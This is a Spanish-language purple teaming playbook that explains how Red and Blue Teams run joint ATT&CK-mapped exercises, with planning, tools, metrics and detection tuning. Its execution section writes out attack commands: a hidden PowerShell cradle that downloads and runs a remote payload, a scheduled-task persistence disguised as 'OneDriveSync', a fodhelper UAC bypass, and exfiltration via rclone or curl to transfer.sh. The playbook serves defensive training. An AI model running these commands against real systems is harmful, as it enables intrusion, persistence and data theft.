1️⃣ Introducción
El Purple Teaming no es un equipo nuevo, sino una forma de trabajo colaborativa entre Red Team y Blue Team. Su objetivo es mejorar la defensa usando ataques reales, iterando y ajustando detecciones, reglas y respuestas con cada simulación.
Este playbook describe cómo montar ejercicios Purple efectivos: desde la planificación táctica, herramientas, ejecución paso a paso y cómo medir resultados técnicos.
2️⃣ Objetivos técnicos del Purple Teaming
- Validar detecciones (SIEM, EDR, NDR) contra TTPs reales
- Simular técnicas de MITRE ATT&CK por fase
- Ajustar reglas Sigma, YARA, correlation rules y alertas
- Validar tiempos de detección y contención
- Transferir conocimientos entre Red y Blue para evolucionar ambos lados
3️⃣ Planificación del ejercicio
Antes de empezar, define con precisión:
- Escenario: Ataque inicial → ejecución → persistencia → escalada → movimiento lateral → exfiltración.
- Entorno: Red de laboratorio, infraestructura controlada o entorno real con permisos.
- Roles: Red Team ataca y documenta Blue Team detecta y responde Purple Team coordina, registra y ajusta reglas.
- Timing: Duración por fase: 1 a 2 horas
Tiempo total: entre medio día y 2 días (según profundidad).
4️⃣ Herramientas necesarias por equipo
- Red Team: Cobalt Strike (demo) Sliver, SharpHound, Invoke-Obfuscation, Rubeus, GoPhish
- Blue Team: EDR: (CrowdStrike, Defender ATP, SentinelOne, Wazuh, etc.). SIEM: (Splunk, Elastic, Sentinel). Velociraptor, Sysmon con configuración avanzada, reglas Sigma adaptadas.
- Purple Team: MITRE ATT&CK Navigator. Planillas de mapeo. Cheatsheets de queries. Documentación compartida (Obsidian, OneNote, Git).
5️⃣ Ejecución táctica por fase
- Acceso inicial (T1566 – Phishing): El Red Team lanza un correo con un documento .docm que ejecuta un stager de Cobalt Strike.
- Ejecución (T1059 – PowerShell): Stager ejecuta un payload remoto con "código": powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://IP/payload.ps1')
- Persistencia (T1053 – Scheduled Task): El payload genera una tarea automática con "código": schtasks /create /tn "OneDriveSync" /tr "powershell.exe ..." /sc onlogon
- Escalada de privilegios (T1548 – Bypass UAC): Uso de fodhelper.exe para ejecutar "código" sin prompt
- Descubrimiento (T1087 – Account Discovery): SharpHound recolecta info de dominio Velociraptor lanza queries de hunting paralelas para detectar acceso a objetos privilegiados
- Movimiento lateral (T1021 – PsExec, WinRM): Uso de Impacket desde Kali + detección en SIEM por ID 4624 con logon type 3
- Exfiltración (T1048 – over HTTPS): Uso de rclone o CURL hacia servicios como transfer.sh o Dropbox API
6️⃣ Coordinación y feedback en tiempo real
Después de cada fase:
- El Red Team explica qué técnica usó, qué dejó como rastro y cómo evadió defensas.
- El Blue Team revisa si lo detectó, cómo, cuánto tardó y qué se podría mejorar.
- Purple Team ajusta reglas, arma nuevas queries y las despliega para repetir
Ejemplo:
Escalada → no se detectó el uso de fodhelper.exe → se añade regla Sigma con ParentImage != explorer.exe y CommandLine contains fodhelper.exe
7️⃣ Registro y documentación
Para cada fase documenta:
- Técnica ATT&CK usada
- Herramienta utilizada
- Evidencia generada (logs, procesos, red, archivos)
- Alertas generadas vs. esperadas
- Tiempo de detección y contención
- Resultado: detectado / no detectado / mitigado
Recomendación: usa MITRE Navigator para marcar qué técnicas se validaron con éxito y cuáles no.
8️⃣ Métricas que importan
- Tiempo medio de detección (MTTD)
- Tiempo medio de contención (MTTC)
- Técnicas no detectadas (gap analysis)
- Ajustes aplicados (reglas Sigma/YARA nuevas)
- Lessons learned (por fase y generales)
9️⃣ Recursos útiles
- MITRE ATT&CK Navigator: https://mitre-attack.github.io/attack-navigator/
- Sigma Rules: https://github.com/SigmaHQ/sigma
- Velociraptor artefacts: https://docs.velociraptor.app/
- Red Team Tools (SpecterOps): https://github.com/SpecterOps
- Atomic Red Team (simulaciones por técnica): https://github.com/redcanaryco/atomic-red-team
🔟 Tip final
Un ejercicio de un Purple Team no es una demo ni un examen. Es una oportunidad brutal para que ofensiva y defensa crezcan juntos, se escuchen y se alineen. El objetivo no es detectar todo a la primera, sino aprender cómo piensan los atacantes... y cómo anticiparse a ellos en la siguiente.